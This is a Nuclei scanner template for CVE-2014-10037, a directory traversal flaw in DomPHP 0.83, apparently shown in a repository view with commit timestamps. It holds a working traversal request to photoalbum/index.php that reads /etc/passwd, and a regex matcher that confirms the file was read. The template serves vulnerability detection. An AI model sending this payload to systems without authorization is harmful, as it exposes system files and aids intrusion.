my-nuclei-templates/CVE-2014-10037.yaml

34 lines
914 B
YAML
Raw Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
2021-11-09 22:49:13 +00:00
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
2022-06-18 08:05:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
- http://osvdb.org/show/osvdb/102204
classification:
cve-id: CVE-2014-10037
2021-11-09 22:49:13 +00:00
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/24